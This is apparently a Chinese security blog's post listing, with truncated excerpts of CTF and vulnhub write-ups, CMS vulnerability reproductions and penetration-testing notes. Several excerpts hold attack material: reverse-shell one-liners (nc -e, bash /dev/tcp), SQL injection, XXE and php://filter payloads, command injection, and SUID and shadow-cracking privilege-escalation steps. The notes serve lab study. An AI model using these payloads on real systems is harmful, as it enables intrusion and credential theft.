自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(33)
  • 收藏
  • 关注

转载 iseacms1.0漏洞复现

iseacms1.0漏洞复现 作者: admin 时间: 2021-06-29 分类: 漏洞复现 Index.php源码<?phperror_reporting(0);$file=addslashes($_GET['r']);$action=$file==''?'index':$file;include('files/'.$ac...

2021-06-29 16:29:25 309

转载 espcms5.7.13 sql注入漏洞复现

espcms5.7.13 sql注入漏洞复现 作者: admin 时间: 2021-06-28 分类: 漏洞复现 使用代码审计工具自动审计,找到select语句,双击进入/adminsoft/control/citylist.php文件可以看到$sql = "select * from $db_table where parentid=$pa...

2021-06-29 16:28:19 586

转载 尤里的复仇Ⅰ 小芳!

尤里的复仇Ⅰ 小芳! 作者: admin 时间: 2021-06-15 分类: 封神台 第一章:为了女神小芳!找到get参数id,使用"1'","1 or 1=1","1 or 1=2"测试,发现存在sql注入。最终payload为"id=1 and 1=2 union select 1,password from admin"。第二章:遇到...

2021-06-15 17:52:04 4735

转载 BLUEMOON: 2021

BLUEMOON: 2021 作者: admin 时间: 2021-06-10 分类: vulnhub靶场 fping -g 192.168.137.1/24 # step1 扫主机,找到靶场131nmap -A -p 1-65535 -v 192.168.137.131 # step2 扫端口,扫到21,22,80dirb http:/...

2021-06-11 09:26:45 545

转载 日志管理分析1

日志管理分析1 作者: admin 时间: 2021-06-09 分类: Linux secure中是sshd的日志,grep过滤出需要的信息(-v是反选),awk取出ipi=$10代表以空格分隔第10个字符串,count[ip1]++就是个数组,END是文档结尾后,最后遍历数组并输出sort是排序,-n按数字排序,-r代表降序head -1...

2021-06-11 09:25:59 54

转载 CLOVER: 1

CLOVER: 1 作者: admin 时间: 2021-06-08 分类: vulnhub靶场 1.主机发现,fping -g 192.168.137.0/24 | grep alive > /tmp/fpinged2.端口扫描,nmap -A -p 1-65535 -v 192.168.137.2223.ftp开启了匿名登录,get...

2021-06-10 08:55:25 267

转载 hacksudo: L.P.E.

hacksudo: L.P.E. 作者: admin 时间: 2021-06-03 分类: vulnhub靶场 step1.存活主机探测,使用"fping -g 192.168.3.0/24"扫描,结果如下,1是网关,129是kali,目标主机是133step2.端口扫描,使用"nmap -A -p 1-65535 -v 192.168.3....

2021-06-10 08:54:38 374

转载 debian忘记root密码怎么找回

debian忘记root密码怎么找回 作者: admin 时间: 2021-06-03 分类: Linux 写这篇文章是因为vulnhub的靶场上vmware上不能自动获取ip,要改一下ip配置文件grub界面按e,在大约倒数第3行的位置"ro"改为"rw init=/bin/sh",如图: 按"ctrl+x"进入单用户界面"mount -a...

2021-06-10 08:54:06 1590

转载 AKCMS后台存在文件上传漏洞

AKCMS后台存在文件上传漏洞 作者: admin 时间: 2021-06-03 分类: CNVD漏洞复现 在cnvd上找了文件上传漏洞,到cms的官网上把源码下载下来在本地复现安装界面如图:后台是这样的系统-模板-增加一个新模板,名字随便,内容如下接着在内容-单页下增加一个,使用刚才新建的模板验证 标签: n...

2021-06-10 08:53:09 283

转载 云演CTF: 012.exec

云演CTF: 012.exec 作者: admin 时间: 2021-05-31 分类: 信息收集 首页内容"the post Parameter is ip"POST传入参数ip=127.0.0.1可以用'&','|',';'等符号命令截断,传入ip=127.0.0.1;idflag在系统根目录 标签...

2021-06-10 08:52:20 357 1

转载 云演CTF: 011.这里有几首歌

云演CTF: 011.这里有几首歌 作者: admin 时间: 2021-05-31 分类: 云演CTF 首页有两个下载链接,其中"download.php?url=Y2hvdWJhZ3VhaS5tcDM="的base64解码后内容是"choubaguai.mp3",将"index.php"、"download.php"编码传入url,"in...

2021-06-10 08:51:40 417

转载 云演CTF: 010.php4fun

云演CTF: 010.php4fun 作者: admin 时间: 2021-05-31 分类: 云演CTF 题目给出源码备份"index.bak":<?phpfunction filter($v){ echo $v; $w = array('<','>','\.\.','^/+.*','file:///','php...

2021-06-10 08:51:01 925

转载 云演CTF: 009.php_for_fun

云演CTF: 009.php_for_fun 作者: admin 时间: 2021-05-31 分类: 云演CTF 在首页的返回头中获得hint文件名,内容是"Please input a parameter as number!!"尝试传入参数"number",返回"Please input a parameter as number!!"...

2021-06-10 08:50:22 564

转载 云演CTF: 008.后台管理系统

云演CTF: 008.后台管理系统 作者: admin 时间: 2021-05-31 分类: 云演CTF 右下角点击注册了个test用户,提示管理员才能拿到flag,再注册admin用户,返回用户已存在,尝试注册"admin ",注册成功拿到flag,想想不应该这么简单,百度"基于约束的sql注入",sql中字段有固定的长度,超出的部分就丢弃...

2021-06-10 08:49:16 1132

转载 云演CTF: 007.blog

云演CTF: 007.blog 作者: admin 时间: 2021-05-28 分类: 信息收集 打开就是登录界面,直接'123456',出现弹窗,还以为是js验证(想多了),CTRL+u打开源码$(function(){ var $login = $("#login"); $login.on( "click...

2021-06-09 22:57:45 924

转载 云演CTF: 006.Lfi

云演CTF: 006.Lfi 作者: admin 时间: 2021-05-28 分类: 云演CTF 看名字就知道是local file include(本地文件包含),之前的笔记里有写过(打ctf时记的笔记(php))payload: ?file=php://filter/read=convert.base64-encode/resource...

2021-06-09 22:56:49 551

转载 云演CTF: 005.Blog

云演CTF: 005.Blog 作者: admin 时间: 2021-05-28 分类: 云演CTF 网站是个没有内容的博客,返回头表明了后端语言"Werkzeug/1.0.1 Python/2.7.6",尝试几个"www.zip,robots.txt"之类的路径没什么发现,然后各个标签点了点,发现了/div/目录,是这个样子的google一...

2021-06-09 22:53:08 814 1

转载 云演CTF: 004.intval

云演CTF: 004.intval 作者: admin 时间: 2021-05-27 分类: 云演CTF 进去直接给了代码<?phpif(!isset($_GET['source'])){ highlight_file('index.php'); die();}include('flag.php');$key1 ...

2021-06-09 22:51:02 1028

转载 云演CTF: 003.ereg

云演CTF: 003.ereg 作者: admin 时间: 2021-05-27 分类: 云演CTF 主页空白,没有返回有效信息。顺手打开robots.txt,发现源码,这个文本是给搜索引擎看的,里面的收录的目录和文件不会出现在搜索结果中(然并卵)if (isset ($_GET['password'])) {if (ereg ("1+$"...

2021-06-09 22:50:13 537

转载 云演CTF: 001单身一百年也没用和002单身20年的手速

云演CTF: 001单身一百年也没用和002单身20年的手速 作者: admin 时间: 2021-05-27 分类: 云演CTF 做前两题的时候没想到发出来,现在补上第一题在search_key.php的返回头里,通过chrome开发者工具能看到,然后base64解码提交第二题在search_key.php的返回体里,地址栏中输入这种格式的...

2021-06-09 22:49:18 613 1

转载 发现ctf平台

发现ctf平台 作者: admin 时间: 2021-05-27 分类: 灌水 想挖src漏洞,一直无处下手,然后就从安全客的活动中看到这个ctf平台,想想差不多一年没打了,再熟悉一下https://www.yunyansec.com/ 标签: none ...

2021-06-09 22:48:12 130

转载 暂时就这些

暂时就这些 作者: admin 时间: 2021-05-27 分类: 灌水 以前的笔记传的差不多了,还剩一些零零散散的东西整理起来太麻烦,就不管了 标签: none ...

2021-06-09 22:46:52 50

转载 常用的yum/apt源

常用的yum/apt源 作者: admin 时间: 2021-05-27 分类: Linux Centos-7.repo.txtkaliApt-get.list.txtcdrom.repo.txt 标签: linux

2021-06-09 22:45:50 59

转载 几个反弹shell

几个反弹shell 作者: admin 时间: 2021-05-27 分类: 信息收集 nc -e /bin/bash 192.168.137.17 4444(www-data)bash -i >& /dev/tcp/192.168.137.17/4444 0>&1(www-data)echo "bash -i &...

2021-06-09 22:44:29 123

转载 提权的几种方法

提权的几种方法 作者: admin 时间: 2021-05-27 分类: 权限提升 1.用searchexploit搜索系统版本漏洞,也可以用谷歌或者"https://www.exploit-db.com"2.如果/etc/shadow文件可读,可以爆破密码unshadow passwd shadow > crackedjohn cra...

2021-06-08 14:54:17 329

转载 SQL注入

SQL注入 作者: admin 时间: 2021-05-27 分类: 漏洞利用 select user from users limit 0,1 # 取查询结果的0-1条记录select group_concat(user) from users # 将查询结果合并输出select distinct(user) from user...

2021-06-08 14:53:22 66

转载 xxe利用

xxe利用 作者: admin 时间: 2021-05-27 分类: 漏洞利用 windows模板<?xml version="1.0"?><!DOCTYPE a [<!ENTITY test SYSTEM "file:///c:/windows/system.ini">]><something&gt...

2021-06-08 14:52:38 90

转载 收集linux用户密码版本...

收集linux用户密码版本... 作者: admin 时间: 2021-05-27 分类: 信息收集 meterpreter > sysinfo/etc/passwd/etc/shadow/etc/issue/etc/*-releaseuname -a 标签: linux ...

2021-06-08 14:51:53 78

转载 提权技巧(suid)

提权技巧(suid) 作者: admin 时间: 2021-05-27 分类: 权限提升 用以下命令查找find / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -print2>/dev/null下面的是利用方式,这里不全,每个含有suid权限的文件都可以...

2021-06-08 14:51:09 218

转载 内网存活主机探测

内网存活主机探测 作者: admin 时间: 2021-05-27 分类: 信息收集 fping -ag 192.168.137.1/24 # 网段内存活主机探测netdiscover -i eth0 -r 192.168.137.1/24 # 网段内存活主机探测arping 192.168.137.1 # mac地址探测nmap -sP 1...

2021-06-08 14:50:23 375

转载 js小技巧(编码解码工具)

js小技巧(编码解码工具) 作者: admin 时间: 2021-05-27 分类: CTF 浏览器中按F12,在console标签栏中输入btoa(string) // base64编码,参数stringatob(base64String) // base64解码,参数base64Stringescape(string) ...

2021-06-08 14:48:52 366

转载 打ctf时记的笔记(php)

打ctf时记的笔记(php) 作者: admin 时间: 2021-05-27 分类: CTF ?page=php://filter/read=convert.base64-encode/resource=index.php // 文件包含查看源码?page=php://input // post发送包含page的文件内容?pag...

2021-06-08 14:47:59 221

转载 我的第一篇文章

我的第一篇文章 作者: admin 时间: 2021-05-26 分类: 灌水 我的第一篇文章 标签: none

2021-06-08 13:41:32 55

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除